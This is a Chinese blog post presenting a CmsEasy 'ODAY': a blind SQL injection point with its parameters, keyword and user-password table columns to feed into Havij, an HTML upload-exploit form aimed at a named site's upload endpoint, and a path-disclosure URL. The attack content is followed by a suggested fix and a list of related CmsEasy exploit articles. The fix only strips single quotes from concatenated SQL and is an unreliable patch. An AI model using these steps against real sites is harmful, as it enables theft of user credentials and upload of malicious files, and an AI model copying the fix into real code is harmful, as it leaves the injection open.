cmseasy(易通CMS) 注入漏洞 上传漏洞 爆路径ODAY(含修复)

最新推荐文章于 2024-10-02 23:30:14 发布
最新推荐文章于 2024-10-02 23:30:14 发布
阅读量2.7k 收藏 2
点赞数
分类专栏: 漏洞收集 文章标签: CmsEasy

注入漏洞
注入点:/celive/js/include.php?cmseasylive=1111&departmentid=0
类型: mysql blind—string
错误关键字:online.gif
表名:cmseasy_user
列明:userid,username,password
直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user 列表:userid,username,password 关键字:Powered by CmsEasy
暴路径ODAY
直接把爆路径 如:http://seelx.com/index.php?case=archive

上传漏洞

Exp:

<form enctype=”multipart/form-data” method=”post” action=”http://www.hackqing.com/celive/live/doajaxfileupload.php”>
<input type=”file” name=”fileToUpload”>
<input type=”submit” value=”上传”>
</form>

注入漏洞修复:

打开/celive/js/include.php 文件,来到52行或此功能代码处
if (isset($_GET['departmentid'])) {
$departmentid = $_GET['departmentid'];
$activity_sql = “SELECT `id` FROM `”.$config['prefix'].”activity` WHERE `departmentid`=’”.$departmentid.”‘ AND `operatorid`=’”.$operatorid.”‘”;

将代码改为
if (isset($_GET['departmentid'])) {
$departmentid = str_replace(“‘”,””,$_GET['departmentid']);
$activity_sql = “SELECT `id` FROM `”.$config['prefix'].”activity` WHERE `departmentid`=’”.$departmentid.”‘ AND `operatorid`=’”.$operatorid.”‘”;

7禧
关注
专栏目录
漏洞复现】CmsEasy crossall_act.php SQL注入漏洞
失心少年
07-28 256
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!CmsEasy存在SQL注入漏洞,通过文件service.php加密SQL语句执行即可执行任何SQL命令。文件中得到了$key='cmseasy_sql’和加解密方法,构造请求获取密码md5。代码中构造参数sql,然后使用方法unlockString解码执行SQL语句。
帝国cms漏洞CMS7.5漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 2155
一.帝国cms漏洞简介 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。 [帝国cms漏洞影响版本]
CmsEasy 漏洞挖掘
hyun134340的博客
01-07 317
在index.php ,定义了一些常量,设置 文件包的目录,和注册了自定义加载类。lib目录中前两个文件夹分别存放的是后台和前台的控制器。inc文件夹提供一些必要的支撑,数据库的操作,以及控制器的基类,模板渲染类。所有的控制器都继承于 act 类。同时他还给所有数据库的表,设计了相对应的操作,位于table文件夹下,此文件夹下的类也都继承于 table类。tool文件夹存放一些小工具,自定义函数,waf之类的,应用调度,也是在此文件夹处理。继续跟进入口文件。
CmsEasy易通企业网站系统最新注入漏洞
weixin_33881140的博客
09-14 362
易通企业网站系统最新注入漏洞注入EXP: http://www.xxx.com/celive/js/include.php?cmseasylive=1111&departmentid=0 直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user 列表:userid,username,pas...
常见的CMS漏洞
最新发布
2303_76600842的博客
10-02 1269
本文利用了自己搭建的环境用于介绍了几种常见的CMS内容管理系统,以及登入之后怎么利用其中的GetShell的方式。
i春秋-百度杯九月场-YeserCMS(cmseasy的UpdateXML注入漏洞)
weixin_30764137的博客
03-09 925
学习了大佬们的操作才做出来,记录一次菜鸡的无能为力。 tips:flag在网站根目录下的flag.php中。我们的目标就是flag.php了。 题目说是心的CMS:YeserCMS,然而百度一下,出来该题的wp之外,并没有这个CMS。可能是把原来的CMS改名了,在网站中找看看有没有什么线索,最后发现有cmseasy的标识: 于是百度寻找cmseasy的漏...
【Web】CmsEasy 漏洞复现
uuzeray的博客
11-25 1474
但p=system('xxx');却不能执行(没有disable_functions)账号密码都是admin admin,不知道为什么,这里就先当作是默认吧。在页面里post传g=phpinfo();(其实都是信息检索,能在网上搜到就行hhh)看到左边列表有模板,心里大概有数了哈。挺奇怪的,可能不是linux系统?进行一波历史漏洞的查。
cmseasy支付漏洞
qq_68186313的博客
08-02 340
2、选购商品,将购买数量改为“-1”,余额为0,但购买成功。1、访问购物站点并注册用户ABCDE:123456。3、通过负数支付,我们的余额由0变1620。
CmsEasy crossall_act.php SQL注入漏洞.md
04-08
CmsEasy是一种内容管理系统(CMS),通常被用作构建和管理网站的平台。根据提供的文件信息,CmsEasy的crossall_act.php文件中存在一个SQL注入漏洞,这是在IT行业中常见的安全漏洞类型。SQL注入攻击者可以通过这个...
CmsEasy 易通企业网站系统本机体验包 v6.3_20180808
10-10
易通企业网站系统 别名CmsEasy 是国内唯一微信+手机端+微网站+手机短信+在线销售+多语言网站组合的企业营销管理平台,易通企业网站系统也称易通企业网站程序,是易通公司开发
cmseasy业务逻辑漏洞
huohaowen的博客
01-19 928
这个cmseasy靶场似乎感觉有点意思?
CmsEasy7.5.4 逻辑漏洞
weixin_53303754的博客
10-16 223
CmsEasy7.6.3.2逻辑漏洞
西电卢本伟的博客
04-22 4971
cmseasy、逻辑漏洞
CmsEasy逻辑漏洞报告
喜欢创作各种技术类文章,希望可以帮到你
01-25 561
一下赚了这么多钱,好开心。哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈。数量修改为-900,放包。进入商品界面,购买商品。开启抓包,然后点击购买。成功购买,查看会员中心。填写联系方式,并支付。
easycms php7.1,cmseasy sql注入漏洞(无视防御)
weixin_35029527的博客
03-29 1075
cmseasy某处sql注入,无视防御从/celive/live/index.php开始:include('../include/config.inc.php');include_once(CE_ROOT . '/include/celive.class.php');$ac = addslashes($_GET['action']);if ($ac == '1') {$live = new cel...
cmseasy漏洞之未授权访问漏洞和sql注入漏洞
banliyaoguai的博客
08-10 1315
下图中到码对args参数首先经过了base64解码,然后经过了一个框架中所带xxtea_decrypt方法的解密,在之后到$user参数时又经过了一次反序列化,所以我们构造的payload就需要将上述过程反着来一遍这样当参数传入进来的时候才可以经过一列加解密转化为我们正常的注入语句。将其解压部署在服务器上后,访问\uploads\install这个路径,然后页面就会显示让你安装,然后按照页面提示修改php版本和mysql版本,然后设置你的数据库参数,最后设置你管理员账号密码就可以安装了。
【代码审计】CmsEasy_v5.7 代码执行漏洞分析
12-02 2913
&#13; &#13; 0x00 环境准备&#13; CmsEasy官网:http://www.cmseasy.cn/&#13; 网站源码版本:CmsEasy_v5.7_UTF8-0208&#13; 程序源码下载:&#13; http://ftp.cmseasy.cn/CmsEasy5.x/CmsEasy_5.7_UTF-8_20180208.zip&#13; 测试网站首页...
CmsEasy代码审计:SQL注入漏洞与file_get_contents风险
1. **SQL注入漏洞点1:**在`lib/admin/database_admin.php`的`dorestore_action()`方法中,存在一个潜在的SQL注入漏洞。当接收到来自GET参数`db_dir`的用户输入后,程序通过`front::scan($dir)`调用`tdatabase::...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值